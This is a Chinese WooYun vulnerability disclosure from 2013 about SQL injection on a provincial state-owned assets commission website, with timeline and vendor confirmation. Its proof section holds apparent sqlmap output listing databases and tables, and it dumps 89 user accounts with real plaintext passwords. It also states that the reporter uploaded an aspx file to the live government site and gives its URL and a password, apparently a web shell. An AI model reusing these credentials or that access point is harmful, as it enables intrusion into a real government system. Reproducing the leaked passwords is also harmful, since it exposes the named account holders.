当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045185

漏洞标题:某省国有资产监督管理委员会SQL注射漏洞可能导致getshell

相关厂商:某省国有资产监督管理委员会

漏洞作者: 雅柏菲卡

提交时间:2013-12-10 19:00

修复时间:2014-01-24 19:00

公开时间:2014-01-24 19:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-10: 细节已通知厂商并且等待厂商处理中
2013-12-14: 厂商已经确认,细节仅向厂商公开
2013-12-24: 细节向核心白帽子及相关领域专家公开
2014-01-03: 细节向普通白帽子公开
2014-01-13: 细节向实习白帽子公开
2014-01-24: 细节向公众公开

简要描述:

..........

详细说明:

.......

漏洞证明:

注射点 
available databases [24
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FJGZW
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Database: FJGZW
[63 tables]
+-------------------------+
| BMXT_DYDT |
| BMXT_GGXX |
| BMXT_KCKS |
| BMXT_KSXX |
| BMXT_QYPZ |
| BMXT_UINFO |
| BMXT_ZKZ |
| CANDIDATES |
| CANDIDATESJOB |
| CATALOG_APPLY |
| CATALOG_INFOS |
| COLUMN_CONFIG |
| COLUMN_DROPDOWNLIST |
| COLUMN_PARAMCONFIG |
| COMM_INTERVIEW_ADDTITLE |
| COMM_INTERVIEW_COTTEN |
| COMM_INTERVIEW_PHOTOS |
| COMM_LETTER |
| COMM_OFTENQUESTION |
| COMM_VOTE |
| COMM_VOTEITEM |
| DATADEPORT_NEWSTYPE |
| ECONOMY_INFO |
| ECONOMY_PAGEPARAMCONFIG |
| ECONOMY_TYPECONFIG |
| JOB |
| LAWBREAK_INFOS |
| LICENSETABLE_AUDITITEM |
| LICENSETABLE_INFOS |
| NETPOLL |
| NEWS_ATTACHCOLUMNTYPE |
| NEWS_INFOS |
| NEWS_INFOS_DEL |
| NEWS_PROCESSCONFIG |
| NEWS_PROSPECIALSATUS |
| PHOTO |
| PHOTOTYPE |
| POLL_ANSWER |
| POLL_QUESTION |
| RECRUITMENT |
| SYNC_BTBL_CATALOG_APPLY |
| SYNC_BTBL_CATALOG_INFOS |
| SYNC_BTBL_COMM_LETTER |
| SYNC_BTBL_NEWS_INFOS |
| SYS_DEPARTMENTINFO |
| SYS_LOG |
| SYS_MENUS |
| SYS_ROLEMENU |
| SYS_ROLES |
| SYS_USERROLE |
| SYS_USERS |
| TBIP |
| TBVISITLM |
| TBVISITLOG |
| TBVISITLOGTEMP |
| TBVISITLOG_KTC |
| URL_INFOS |
| USERINFO |
| VIEW_INFO |
| VISIT_COLUMNQUANTITY |
| VISIT_LOG |
| VISIT_MONTHREPORT |
| VISIT_WEBQUANTITY |
+-------------------------+
Database: FJGZW
Table: SYS_USERS
[89 entries]
+------------+--------------+------------+------------------+--------+---------------+----------------+----------+------------+----------+------------+
| CAUSERNAME | DEPARTMENTID | ERORRLOGON | PASSWORD | USERID | USERLASTLOGON | USERLOGONTIMES | USERNAME | USERSIGNON | USERTYPE | USERTYPEID |
+------------+--------------+------------+------------------+--------+---------------+----------------+----------+------------+----------+------------+
| NULL | 1 | 0 | admin8615 | 1 | 05-12 | 5605 | NULL | admin | NULL | T |
| NULL | 4 | 0 | 8806 | 108 | 24-6 | 62 | NULL | cqc | NULL | T |
| NULL | 5 | 0 | 87668638 | 109 | 15-10 | 211 | NULL | ghc | NULL | T |
| NULL | 6 | 0 | 99999 | 110 | 09-10 | 173 | NULL | ggfpc | NULL | T |
| NULL | 7 | NULL | 8888 | 111 | 14-7 | 39 | NULL | fpc | NULL | NULL |
| NULL | 8 | 0 | 8888 | 112 | 29-11 | 72 | NULL | jsh | NULL | T |
| NULL | 9 | 0 | 8888 | 113 | 21-11 | 89 | NULL | zzb | NULL | T |
| NULL | 10 | 0 | 8888 | 114 | 24-10 | 202 | NULL | jcs | NULL | T |
| NULL | 11 | 0 | 8888 | 115 | 15-11 | 149 | NULL | jgdw | NULL | T |
| NULL | 2 | 0 | 8888 | 116 | 05-12 | 280 | NULL | fgc | NULL | NULL |
| NULL | 13 | 0 | 2128 | 118 | 29-11 | 563 | NULL | shjt | NULL | T |
| NULL | 14 | 0 | 8888 | 119 | 06-11 | 1182 | NULL | qfkg | NULL | T |
| NULL | 30 | 0 | 8888 | 120 | 04-12 | 1195 | NULL | jtjt | NULL | T |
| NULL | 15 | 0 | 87553584 | 121 | 03-12 | 656 | NULL | yjkg | NULL | T |
| NULL | 16 | 0 | 8888 | 122 | 29-11 | 119 | NULL | cbjt | NULL | T |
| NULL | 17 | 0 | 123456 | 123 | 27-11 | 375 | NULL | qcjt | NULL | T |
| NULL | 29 | 0 | bgs666 | 124 | 04-12 | 1017 | NULL | jgjt | NULL | T |
| NULL | 18 | 0 | 8888 | 125 | 05-12 | 1007 | NULL | nyjt | NULL | NULL |
| NULL | 191 | 0 | 87812919 | 127 | 16-9 | 86 | NULL | cqzx | NULL | NULL |
| NULL | 20 | 0 | fidc2942 | 128 | 05-12 | 1514 | NULL | tzjt | NULL | T |
| NULL | 21 | 0 | 123456 | 130 | 06-12 | 449 | NULL | wmjt | NULL | T |
| NULL | 22 | 0 | 8888 | 131 | 27-11 | 346 | NULL | hmjt | NULL | T |
| NULL | 23 | 0 | 70771900 | 132 | 04-12 | 599 | NULL | gsgl | NULL | NULL |
| NULL | 24 | 0 | 1119 | 133 | 03-12 | 435 | NULL | zljt | NULL | T |
| NULL | 25 | 0 | 8888 | 134 | 04-12 | 1479 | NULL | jdkg | NULL | T |
| NULL | 26 | 0 | 666888 | 136 | 04-12 | 372 | NULL | dzjt | NULL | T |
| NULL | 14 | NULL | 8888 | 137 | NULL | NULL | NULL | qfkgrs | NULL | NULL |
| NULL | 28 | NULL | 8888 | 138 | 26-4 | 68 | NULL | hqsy | NULL | T |
| NULL | 31 | 0 | 8888 | 139 | 26-11 | 241 | NULL | fzgzw | NULL | T |
| NULL | 32 | 0 | xmgzw520 | 140 | 05-12 | 594 | NULL | xmgzw | NULL | T |
| NULL | 33 | 0 | 8888 | 141 | 05-12 | 411 | NULL | zzgzw | NULL | T |
| NULL | 34 | 0 | 28008990 | 142 | 06-12 | 1477 | NULL | qzgzw | NULL | T |
| NULL | 35 | 0 | 8888 | 143 | 22-11 | 388 | NULL | smgzw | NULL | T |
| NULL | 36 | 0 | 12345678 | 144 | 24-10 | 389 | NULL | ptgzw | NULL | T |
| NULL | 37 | 0 | 8868202 | 145 | 23-10 | 122 | NULL | npgzw | NULL | T |
| NULL | 38 | 0 | LYGZ05972105136 | 187 | 04-12 | 319 | NULL | lygzw | NULL | T |
| NULL | 39 | 0 | 172507 | 207 | 11-12 | 21 | NULL | ndgzw | NULL | T |
| NULL | 241 | NULL | 8888 | 227 | 21-6 | 1 | NULL | qjjt | NULL | NULL |
| NULL | 3 | 0 | 87668622 | 268 | 12-11 | 121 | NULL | tpc | NULL | T |
| NULL | 242 | NULL | 8888 | 287 | 21-6 | 1 | NULL | sazgs | NULL | NULL |
| NULL | 243 | NULL | 8888 | 288 | 21-6 | 1 | NULL | jzsjy | NULL | NULL |
| NULL | 244 | NULL | 8888 | 289 | 21-6 | 1 | NULL | jzkxy | NULL | NULL |
| NULL | 245 | NULL | 8888 | 290 | 21-6 | 1 | NULL | nfgf | NULL | NULL |
| NULL | 246 | NULL | 8888 | 291 | 21-6 | 1 | NULL | hmtz | NULL | NULL |
| NULL | 247 | NULL | 8888 | 292 | 21-6 | 1 | NULL | hsgq | NULL | NULL |
| NULL | 13 | NULL | 8888 | 293 | 02-9 | 1 | NULL | shjtrs | NULL | NULL |
| NULL | 15 | NULL | 8888 | 294 | NULL | NULL | NULL | yjkgrs | NULL | NULL |
| NULL | 16 | NULL | 8888 | 295 | NULL | NULL | NULL | cbjtrs | NULL | NULL |
| NULL | 17 | NULL | 8888 | 296 | NULL | NULL | NULL | qcjtrs | NULL | NULL |
| NULL | 18 | NULL | 8888 | 297 | NULL | NULL | NULL | nyjtrs | NULL | NULL |
| NULL | 20 | NULL | 8888 | 298 | NULL | NULL | NULL | tzjtrs | NULL | NULL |
| NULL | 21 | NULL | 8888 | 299 | NULL | NULL | NULL | wmjtrs | NULL | NULL |
| NULL | 22 | NULL | 8888 | 300 | NULL | NULL | NULL | hmjtrs | NULL | NULL |
| NULL | 23 | NULL | 8888 | 301 | NULL | NULL | NULL | gsglrs | NULL | NULL |
| NULL | 235 | 0 | 8888 | 302 | 24-10 | 2 | NULL | gwjt | NULL | NULL |
| NULL | 236 | NULL | 8888 | 307 | 21-6 | 1 | NULL | fjsl | NULL | NULL |
| NULL | 237 | NULL | 8888 | 308 | 21-6 | 1 | NULL | myzgs | NULL | NULL |
| NULL | 238 | NULL | 8888 | 309 | 21-6 | 1 | NULL | sgjt | NULL | NULL |
| NULL | 239 | NULL | 8888 | 310 | 21-6 | 1 | NULL | nply | NULL | NULL |
| NULL | 240 | NULL | 8888 | 311 | 21-6 | 1 | NULL | xmwy | NULL | NULL |
| NULL | 211 | NULL | 8888 | 312 | 17-1 | 6 | NULL | xfb | NULL | NULL |
| NULL | 231 | NULL | 8888 | 313 | 21-6 | 1 | NULL | dndh | NULL | NULL |
| NULL | 232 | NULL | 8888 | 314 | 21-6 | 1 | NULL | mzwlj | NULL | NULL |
| NULL | 233 | NULL | 8888 | 315 | 19-8 | 2 | NULL | fjnz | NULL | NULL |
| NULL | 234 | NULL | 8888 | 316 | 19-8 | 2 | NULL | qszy | NULL | NULL |
| NULL | 0 | NULL | 8888 | 317 | NULL | NULL | NULL | hsgq | NULL | NULL |
| NULL | 248 | NULL | 8888 | 318 | 21-6 | 1 | NULL | bgzb | NULL | NULL |
| NULL | 251 | 0 | 8888 | 319 | 21-11 | 263 | NULL | zhc | NULL | NULL |
| NULL | 1 | 0 | fjzzbxy1 | 320 | 22-11 | 363 | NULL | xy | NULL | NULL |
| NULL | 24 | NULL | 8888 | 321 | NULL | NULL | NULL | zljtrs | NULL | NULL |
| NULL | 249 | NULL | 8888 | 322 | 21-6 | 1 | NULL | hxkh | NULL | NULL |
| NULL | 250 | NULL | 8888 | 323 | 21-6 | 1 | NULL | shhg | NULL | NULL |
| NULL | 25 | NULL | 8888 | 324 | NULL | NULL | NULL | jdkgrs | NULL | NULL |
| NULL | 26 | NULL | 8888 | 325 | NULL | NULL | NULL | dzjtrs | NULL | NULL |
| NULL | 28 | NULL | 8888 | 326 | NULL | NULL | NULL | hqsyrs | NULL | NULL |
| NULL | 29 | NULL | 8888 | 327 | NULL | NULL | NULL | jgjtrs | NULL | NULL |
| NULL | 30 | NULL | 8888 | 347 | NULL | NULL | NULL | jtjtrs | NULL | NULL |
| NULL | 1 | 3 | YUANX13489102884 | 367 | 18-9 | 168 | NULL | yuanx | NULL | NULL |
| NULL | 0 | NULL | 8888 | 368 | NULL | NULL | NULL | jdzb | NULL | NULL |
| NULL | 311 | 0 | fjzb1503 | 387 | 29-11 | 217 | NULL | jdzb | NULL | NULL |
| NULL | 9 | NULL | 607607 | 407 | 29-1 | 182 | NULL | zflgw1 | NULL | NULL |
| NULL | 2 | NULL | 888888 | 408 | 27-2 | 54 | NULL | zflgw2 | NULL | NULL |
| NULL | 13 | NULL | 87521108 | 427 | 10-11 | 70 | NULL | NULL | NULL | NULL |
| NULL | 16 | NULL | 888888 | 428 | 07-11 | 34 | NULL | NULL | NULL | NULL |
| NULL | 17 | NULL | 87816956 | 429 | 19-10 | 17 | NULL | NULL | NULL | NULL |
| NULL | 29 | NULL | fjjghr | 430 | 31-12 | 46 | NULL | NULL | NULL | NULL |
| NULL | 28 | NULL | 379165 | 431 | 27-10 | 52 | NULL | NULL | NULL | NULL |
| NULL | 9 | NULL | 8888 | 447 | NULL | NULL | NULL | zflgw3 | NULL | NULL |
| NULL | 0 | NULL | 8888 | 567 | NULL | NULL | NULL | NULL | NULL | NULL |
+------------+--------------+------------+------------------+--------+---------------+----------------+----------+------------+----------+------------+
http://www.fjgzw.gov.cn/admin/News/NewsInfo/ViewPhoto.aspx?newsid=108130 我之前上传了一个aspx的小文件
http://www.fjgzw.gov.cn/UploadFile/newsphoto/201312061216334076.aspx是那个文件

QQ截图20131206235031.png

密码 admin

QQ截图20131206235047.png

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-14 20:41

厂商回复:

最新状态:

暂无